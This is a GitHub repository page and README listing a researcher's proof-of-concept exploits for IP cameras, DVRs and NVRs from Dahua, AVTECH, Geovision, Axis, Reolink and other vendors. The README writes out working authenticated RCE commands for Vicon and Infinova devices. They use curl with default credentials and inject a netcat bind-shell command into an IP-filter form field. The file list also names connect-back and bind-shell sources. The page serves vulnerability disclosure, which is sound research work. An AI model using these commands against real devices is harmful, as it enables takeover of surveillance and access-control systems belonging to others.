Skip to content
Issues has been disabled for these PoC's, as they are simply PoC, Public Domain and unsupported.
Branch: master
Clone or download
Latest commit 1159651 May 15, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
AVTECH-IPCP-RCE.py AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE Jun 18, 2018
AVTECH-RCE.py Update AVTECH-RCE.py Mar 15, 2018
Avtech_Undocumented_API_and_RCE.txt AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE Jun 18, 2018
Axis SSI RCE Update Axis SSI RCE Oct 20, 2017
Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt Axis Communications MPQT/PACS Heap Overflow and Information Leakage Nov 30, 2017
CRISv32-connect-back-shell.c Add files via upload Mar 7, 2017
Dahua Backdoor Shodan One Million.png Add files via upload Mar 14, 2017
Dahua Wiki Firmware Timestamp.png Add files via upload Mar 10, 2017
Dahua Wiki Firmware listing.png Add files via upload Mar 10, 2017
Dahua-DHIP-JSON-Debug-Console.py Dahua DHIP JSON Debug Console Apr 10, 2019
Geovision IP Camera Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access.txt Add files via upload Feb 1, 2018
Geovision-PoC.py Add files via upload Feb 1, 2018
Herospeed-TelnetSwitch.py Update Herospeed-TelnetSwitch.py Jan 22, 2018
LICENSE Create LICENSE Jan 23, 2019
LifeSafetyPower-Netlink-PoC.py LifeSafety Power Netlink PoC May 15, 2019
QNAP NVR NAS Heap - Stack - Heap Feng Shui overflow and "Heack Combo" to pwn.txt Add files via upload Mar 7, 2017
README.md Update README.md May 15, 2019
Remote_Stack_Format_String_multiple OEM.txt Add files via upload Dec 14, 2017
Reolink-IPC-RCE.py Update Reolink-IPC-RCE.py Jun 3, 2018
Reverse stunnel TLSv1 privacy shell.txt Update Reverse stunnel TLSv1 privacy shell.txt Feb 10, 2018
TVT-PoC.py Add files via upload Apr 9, 2018
TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt Update TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosur… Apr 9, 2018
Uniview RCE PoC.txt
Vitek_RCE_and_information_disclosure.txt Update Vitek_RCE_and_information_disclosure.txt Dec 22, 2017
Vivotek IP Cameras - Remote Stack Overflow.txt Add files via upload Nov 12, 2017
axis-ssid-PoC.py Add files via upload Mar 7, 2017
bind-sh.c Add files via upload Mar 7, 2017
crisv32-asm.c Add files via upload Mar 7, 2017
dahua-backdoor-PoC.py Add files via upload May 2, 2017
dahua-backdoor.txt Update dahua-backdoor.txt May 2, 2017
dahua-telnetd-json.py Enable / Disable Telnetd in Dahua (for newer firmware versions) Oct 17, 2017
decrypt-foscam.py Foscam IPC stuff Jan 15, 2018
deobfuscate-foscam.py Foscam IPC stuff Jan 15, 2018
tiny-w3-mcw.c non-crashing Format String Backdoor Proof of Concept Dec 4, 2017

README.md

PoC

misc PoC - Internet of (In)Security Things

Well worth to read about these crappy (in)security things: https://ipvm.com/reports/security-exploits

LifeSafety Power

2019-05-15

Multiple Stack Overflow, RCE, disclosure username/password in clear text and more

https://github.com/mcw0/PoC/blob/master/LifeSafetyPower-Netlink-PoC.py

Dahua DHIP JSON Debug Console (authenticated)

2019-04-10

This script will use Dahua 'DHIP' P2P binary protocol, that works on normal HTTP/HTTPS ports and TCP/5000

Will attach to Dahua devices internal 'Debug Console' using JSON (same type as the former debug on TCP/6789)

https://github.com/mcw0/PoC/blob/master/Dahua-DHIP-JSON-Debug-Console.py

Have fun, bashis

VDOO

2019-01-23

Greetings, long time and no publish ...

I am still around and doing my research, but the news is that I also try to work with VDOO (https://www.vdoo.com/) for vendor management, and this has unfortunately delayed my Full Disclosure process somewhat ...

Anyway, several interesting researches coming up as Full Disclosure here on my GitHub.

With the collaboration with VDOO I can work with that I like to do, and not waste time with the vendors who do (not want | don't understand | want to ignore | want to delay | whatever).

The latest are some Reolink (https://reolink.com/) stuff, which you will find here: https://www.vdoo.com/blog/working-with-the-community-%E2%80%93-significant-vulnerabilities-in-reolink-cameras/.

AVTECH Corporation

2018-06-18

AVTECH {DVR/NVR/IPC} Heap Overflow, IPCP API, RCE

https://github.com/mcw0/PoC/blob/master/Avtech_Undocumented_API_and_RCE.txt

https://github.com/mcw0/PoC/blob/master/AVTECH-IPCP-RCE.py

Reolink Digital Technology Co., Ltd.

2018-06-03

Reolink {IPC} RCE (Authenticated)

https://github.com/mcw0/PoC/blob/master/Reolink-IPC-RCE.py

Shenzhen TVT Digital Technology Co. Ltd

2018-04-09

Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE https://github.com/mcw0/PoC/blob/master/TVT_and_OEM_IPC_NVR_DVR_RCE_Backdoor_and_Information_Disclosure.txt https://github.com/mcw0/PoC/blob/master/TVT-PoC.py

AVTECH

2018-03-05

AVTECH {DVR/NVR/IPC} Authenticated RCE

https://github.com/mcw0/PoC/blob/master/AVTECH-RCE.py

Geovision Inc.

2018-02-01

Geovision Inc. IP Camera/Video/Access Control Multiple Remote Command Execution - Multiple Stack Overflow - Double free - Unauthorized Access https://github.com/mcw0/PoC/blob/master/Geovision%20IP%20Camera%20Multiple%20Remote%20Command%20Execution%20-%20Multiple%20Stack%20Overflow%20-%20Double%20free%20-%20Unauthorized%20Access.txt

Geovision Inc. IP Camera & Video Server Remote Command Execution PoC https://github.com/mcw0/PoC/blob/master/Geovision-PoC.py

Herospeed

2018-01-22

Herospeed TelnetSwitch daemon running on TCP/787, for allowing enable of the telnetd. Where one small stack overflow allows us to overwrite the dynamicly generated password and enable telnetd. https://github.com/mcw0/PoC/blob/master/Herospeed-TelnetSwitch.py

Foscam

2018-01-15

Small OpenSSL wrapper to looping different encryption keys/digest and cipher on Foscam IPC Firmware images. https://github.com/mcw0/PoC/blob/master/decrypt-foscam.py

Deobfuscate strings/login/password/cryptokey in misc Foscam IPC binaries and libs https://github.com/mcw0/PoC/blob/master/deobfuscate-foscam.py

Vitek RCE and Information Disclosure (and possible other OEM) 0-day

2017-12-22

https://github.com/mcw0/PoC/blob/master/Vitek_RCE_and_information_disclosure.txt

Remote Stack Format String in 'nsd' binary from multiple OEM (0-day)

2017-12-14

https://github.com/mcw0/PoC/blob/master/Remote_Stack_Format_String_multiple%20OEM.txt

Image here: http://62.43.36.107:50021/Public/CCTV/GWSecu/GWSecu%20Updater%20para%20c%C3%A1maras/Firmware%20para%20c%C3%A1mara%20domo/

non-crashing Format String Backdoor Proof of Concept

2017-12-05

https://github.com/mcw0/PoC/blob/master/tiny-w3-mcw.c

Vicon Security RCE (authenticated)

2017-12-03

// Enable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user ADMIN:1234 -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Infinova RCE (authenticated)

2017-12-03

// Enable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=2"

// Add to 'IP Filter' and execute

curl --user admin:admin -v -X POST http://[IP:PORT]/form/AddIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

// Disable 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/formChangeFirewallState -d "state=0"

// Remove from 'IP Filter'

curl --user admin:admin -v -X POST http://[IP:PORT]/form/DeleteIPFilter -d "list=2&type=1&filterIp=$(nc -lp 1337 -e/bin/sh)"

Note: Quite sure there is additional OEM's that share same.

Axis Communications

2017-12-01 Axis Communications MPQT/PACS Heap Overflow and Information Leakage https://github.com/mcw0/PoC/blob/master/Axis_Communications_MPQT_PACS_Heap_Overflow_and_information_leakage.txt

Stunnel

2017-11-13 Reverse stunnel TLSv1 privacy shell https://github.com/mcw0/PoC/blob/master/Reverse%20stunnel%20TLSv1%20privacy%20shell.txt

Vivotek

2017-11-13 Vivotek IP Cameras - Remote Stack Overflow https://github.com/mcw0/PoC/blob/master/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt

Uniview

2017-10-29 Uniview RCE and export config PoC https://github.com/mcw0/PoC/blob/master/Uniview%20RCE%20PoC.txt

Axis

2017-10-19 One old forgotten fuzzing back in Q3/2016 that lead to RCE (PoC: Remote connect back shell) and remote read of /etc/shadow. Reported to Axis and fixed in Q3/2016, still posting here now as it may be good hint. https://github.com/mcw0/PoC/blob/master/Axis%20SSI%20RCE

DAHUA

2017-10-17 Enable / Disable Telnetd in Dahua (for newer firmware versions) https://github.com/mcw0/PoC/blob/master/dahua-telnetd-json.py

2017-05-03

Public rerelease of Dahua Backdoor PoC https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py

2017-03-20

With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where knowledge comes from a report made by NSFOCUS and my own research on shodan.io.

With this knowledge, I will not release the Python PoC to the public as before said of April 5, as it is not necessary when the PoC has already been verified by IPVM and other independent security researchers.

However, I'm open to share the PoC with serious security researchers if so desired, please e-mail me off list and be clear about who you are so I do not take you for a beggar, which I ignore.

NSFOCUS report: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/

/bashis


Did you notice the date and time stamps on Dahua's patches? Check the screen shots from http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png

https://dahuawiki.com/images/Firmware/DVR/Q2.2017/ https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png

Not only NVR/DVR/IPC/HDCVI are in the list

Intercom system as well, VTO2000A has been confirmed http://www1.dahuasecurity.com/au/products/vto2000a-762.html

You can’t perform that action at this time.